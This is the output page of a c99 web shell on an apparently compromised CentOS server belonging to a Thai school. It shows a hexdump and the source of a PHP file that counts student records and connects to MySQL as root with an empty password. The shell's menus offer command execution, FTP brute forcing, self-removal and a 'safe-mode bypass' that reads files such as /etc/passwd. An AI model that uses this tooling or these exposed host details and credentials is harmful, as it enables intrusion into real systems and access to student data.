!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/ws_standard_on_reg/   drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.16%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     xml_standard_5_6.php (1.44 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Information:
Path /var/www/html/ws_standard_on_reg/xml_standard_5_6.php
Size 1.44 KB
MD5 f2920d1c2c28442e89b6da142cf3b956
Owner/Group root/root
Perms-rw-r--r--
Create time 06/07/2011 02:01:07
Access time 11/07/2024 17:13:40
MODIFY time 12/10/2008 00:34:40

FULL HEXDUMP
00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8
000002D0
000002E8
00000300
00000318
00000330
00000348
00000360
00000378
00000390
000003A8
000003C0
000003D8
000003F0
00000408
00000420
00000438
00000450
00000468
00000480
00000498
000004B0
000004C8
000004E0
000004F8
00000510
00000528
00000540
00000558
00000570
00000588
000005A0
000005B8
3C 3F 0D 0A 24 69 6E 66 6F 72 6D 61 74 69 6F 6E 20 3D 20 27 3C 3F 78 6D
6C 20 76 65 72 73 69 6F 6E 3D 22 31 2E 30 22 20 65 6E 63 6F 64 69 6E 67
3D 22 77 69 6E 64 6F 77 73 2D 38 37 34 22 3F 3E 27 3B 0D 0A 0D 0A 2F 2F
53 74 61 6E 64 61 72 64 20 35 2D 36 0D 0A 24 69 6E 66 6F 72 6D 61 74 69
6F 6E 20 2E 3D 20 22 5C 6E 3C 53 74 61 6E 64 61 72 64 5F 35 5F 36 3E 22
3B 0D 0A 2F 2F 6E 75 6D 5F 73 74 75 64 65 6E 74 0D 0A 24 68 6F 73 74 3D
22 6C 6F 63 61 6C 68 6F 73 74 22 3B 0D 0A 24 75 73 65 72 6E 61 6D 65 3D
22 72 6F 6F 74 22 3B 0D 0A 24 70 61 73 73 5F 77 6F 72 64 3D 22 22 3B 0D
0A 24 64 62 3D 22 72 65 67 22 3B 0D 0A 2F 2F 6D 79 73 71 6C 5F 71 75 65
72 79 28 22 53 45 54 20 4E 41 4D 45 53 20 54 49 53 36 32 30 22 29 3B 0D
0A 6D 79 73 71 6C 5F 63 6F 6E 6E 65 63 74 28 20 24 68 6F 73 74 2C 24 75
73 65 72 6E 61 6D 65 2C 24 70 61 73 73 5F 77 6F 72 64 29 20 6F 72 20 64
69 65 20 28 22 B5 D4 B4 B5 E8 CD A1 D1 BA B0 D2 B9 A2 E9 CD C1 D9 C5 20
4D 79 73 71 6C 20 E4 C1 E8 E4 B4 E9 20 22 29 3B 0D 0A 6D 79 73 71 6C 5F
73 65 6C 65 63 74 5F 64 62 28 24 64 62 29 20 6F 72 20 64 69 65 28 22 E0
C5 D7 CD A1 B0 D2 B9 A2 E9 CD C1 D9 C5 E4 C1 E8 E4 B4 E9 22 29 3B 0D 0A
24 73 71 6C 20 3D 20 22 53 45 4C 45 43 54 20 2A 20 46 52 4F 4D 20 53 74
75 64 65 6E 74 4D 61 73 74 65 72 20 20 22 3B 0D 0A 24 64 62 71 75 65 72
79 20 3D 20 6D 79 73 71 6C 5F 71 75 65 72 79 28 24 73 71 6C 29 3B 0D 0A
24 6E 75 6D 5F 73 74 75 64 65 6E 74 5F 61 6C 6C 20 3D 6D 79 73 71 6C 5F
6E 75 6D 5F 72 6F 77 73 28 24 64 62 71 75 65 72 79 29 20 3B 0D 0A 2F 2F
65 63 68 6F 20 22 B9 D1 A1 C8 D6 A1 C9 D2 B7 D1 E9 A7 CB C1 B4 20 24 6E
75 6D 5F 73 74 75 64 65 6E 74 5F 61 6C 6C 3C 62 72 3E 22 3B 0D 0A 0D 0A
24 73 71 6C 32 20 3D 20 22 53 45 4C 45 43 54 20 2A 20 46 52 4F 4D 20 53
74 75 64 65 6E 74 4D 61 73 74 65 72 20 20 57 48 45 52 45 20 73 74 75 64
65 6E 74 53 74 61 74 75 73 20 3D 20 27 31 27 22 3B 0D 0A 24 64 62 71 75
65 72 79 32 20 3D 20 6D 79 73 71 6C 5F 71 75 65 72 79 28 24 73 71 6C 32
29 3B 0D 0A 24 6E 75 6D 5F 73 74 75 64 65 6E 74 5F 6E 6F 77 20 3D 6D 79
73 71 6C 5F 6E 75 6D 5F 72 6F 77 73 28 24 64 62 71 75 65 72 79 32 29 20
3B 0D 0A 2F 2F 65 63 68 6F 20 22 B9 D1 A1 C8 D6 A1 C9 D2 B7 D5 E8 A1 D3
C5 D1 A7 C8 D6 A1 C9 D2 CD C2 D9 E8 20 24 6E 75 6D 5F 73 74 75 64 65 6E
74 3C 62 72 3E 22 3B 0D 0A 0D 0A 24 73 71 6C 32 20 3D 20 22 53 45 4C 45
43 54 20 2A 20 46 52 4F 4D 20 53 74 75 64 65 6E 74 4D 61 73 74 65 72 20
20 57 48 45 52 45 20 73 74 75 64 65 6E 74 53 74 61 74 75 73 20 3D 20 27
35 27 22 3B 0D 0A 24 64 62 71 75 65 72 79 32 20 3D 20 6D 79 73 71 6C 5F
71 75 65 72 79 28 24 73 71 6C 32 29 3B 0D 0A 24 6E 75 6D 5F 73 74 75 64
65 6E 74 5F 6F 75 74 20 3D 6D 79 73 71 6C 5F 6E 75 6D 5F 72 6F 77 73 28
24 64 62 71 75 65 72 79 32 29 20 3B 0D 0A 2F 2F 65 63 68 6F 20 22 B9 D1
A1 C8 D6 A1 C9 D2 B7 D5 E8 E8 C5 D2 CD CD A1 20 24 6E 75 6D 5F 73 74 75
64 65 6E 74 5F 6F 75 74 3C 62 72 3E 22 3B 0D 0A 0D 0A 0D 0A 0D 0A 24 69
6E 66 6F 72 6D 61 74 69 6F 6E 20 2E 3D 20 22 5C 6E 3C 6E 75 6D 5F 73 74
75 64 65 6E 74 3E 22 3B 0D 0A 09 24 69 6E 66 6F 72 6D 61 74 69 6F 6E 20
2E 3D 20 22 5C 6E 3C 6E 75 6D 5F 73 74 75 64 65 6E 74 5F 61 6C 6C 3E 22
3B 0D 0A 09 09 24 69 6E 66 6F 72 6D 61 74 69 6F 6E 20 2E 3D 20 22 24 6E
75 6D 5F 73 74 75 64 65 6E 74 5F 61 6C 6C 22 3B 0D 0A 09 24 69 6E 66 6F
72 6D 61 74 69 6F 6E 20 2E 3D 20 22 5C 6E 3C 2F 6E 75 6D 5F 73 74 75 64
65 6E 74 5F 61 6C 6C 3E 22 3B 0D 0A 0D 0A 09 24 69 6E 66 6F 72 6D 61 74
69 6F 6E 20 2E 3D 20 22 5C 6E 3C 6E 75 6D 5F 73 74 75 64 65 6E 74 5F 6E
6F 77 3E 22 3B 0D 0A 09 09 24 69 6E 66 6F 72 6D 61 74 69 6F 6E 20 2E 3D
20 22 24 6E 75 6D 5F 73 74 75 64 65 6E 74 5F 6E 6F 77 22 3B 0D 0A 09 24
69 6E 66 6F 72 6D 61 74 69 6F 6E 20 2E 3D 20 22 5C 6E 3C 2F 6E 75 6D 5F
73 74 75 64 65 6E 74 5F 6E 6F 77 3E 22 3B 0D 0A 0D 0A 09 24 69 6E 66 6F
72 6D 61 74 69 6F 6E 20 2E 3D 20 22 5C 6E 3C 6E 75 6D 5F 73 74 75 64 65
6E 74 5F 6F 75 74 3E 22 3B 0D 0A 09 09 24 69 6E 66 6F 72 6D 61 74 69 6F
6E 20 2E 3D 20 22 24 6E 75 6D 5F 73 74 75 64 65 6E 74 5F 6F 75 74 22 3B
0D 0A 09 24 69 6E 66 6F 72 6D 61 74 69 6F 6E 20 2E 3D 20 22 5C 6E 3C 2F
6E 75 6D 5F 73 74 75 64 65 6E 74 5F 6F 75 74 3E 22 3B 0D 0A 24 69 6E 66
6F 72 6D 61 74 69 6F 6E 20 2E 3D 20 22 5C 6E 3C 2F 6E 75 6D 5F 73 74 75
64 65 6E 74 3E 22 3B 0D 0A 0D 0A 0D 0A 0D 0A 0D 0A 24 69 6E 66 6F 72 6D
61 74 69 6F 6E 20 2E 3D 20 22 5C 6E 3C 2F 53 74 61 6E 64 61 72 64 5F 35
5F 36 3E 22 3B 0D 0A 65 63 68 6F 20 22 24 69 6E 66 6F 72 6D 61 74 69 6F
6E 22 3B 0D 0A 3F 3E 		<?  $information = '<?xm
l version="1.0" encoding
="windows-874"?>';    //
Standard 5-6  $informati
on .= "\n<Standard_5_6>"
;  //num_student  $host=
"localhost";  $username=
"root";  $pass_word=""; 
 $db="reg";  //mysql_que
ry("SET NAMES TIS620"); 
 mysql_connect( $host,$u
sername,$pass_word) or d
ie ("ติดต่อกับฐานข้อมูล 
Mysql ไม่ได้ ");  mysql_
select_db($db) or die("เ
ลือกฐานข้อมูลไม่ได้");  
$sql = "SELECT * FROM St
udentMaster  ";  $dbquer
y = mysql_query($sql);  
$num_student_all =mysql_
num_rows($dbquery) ;  //
echo "นักศึกษาทั้งหมด $n
um_student_all<br>";    
$sql2 = "SELECT * FROM S
tudentMaster  WHERE stud
entStatus = '1'";  $dbqu
ery2 = mysql_query($sql2
);  $num_student_now =my
sql_num_rows($dbquery2) 
;  //echo "นักศึกษาที่กำ
ลังศึกษาอยู่ $num_studen
t<br>";    $sql2 = "SELE
CT * FROM StudentMaster 
 WHERE studentStatus = '
5'";  $dbquery2 = mysql_
query($sql2);  $num_stud
ent_out =mysql_num_rows(
$dbquery2) ;  //echo "นั
กศึกษาที่่ลาออก $num_stu
dent_out<br>";        $i
nformation .= "\n<num_st
udent>";   $information 
.= "\n<num_student_all>"
;   $information .= "$n
um_student_all";   $info
rmation .= "\n</num_stud
ent_all>";     $informat
ion .= "\n<num_student_n
ow>";   $information .=
 "$num_student_now";   $
information .= "\n</num_
student_now>";     $info
rmation .= "\n<num_stude
nt_out>";   $informatio
n .= "$num_student_out";
   $information .= "\n</
num_student_out>";  $inf
ormation .= "\n</num_stu
dent>";          $inform
ation .= "\n</Standard_5
_6>";  echo "$informatio
n";  ?>

HEXDUMP: [Full] [Preview]
Base64: [Encode [+chunk [+chunk+quotes [Decode


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0119 ]--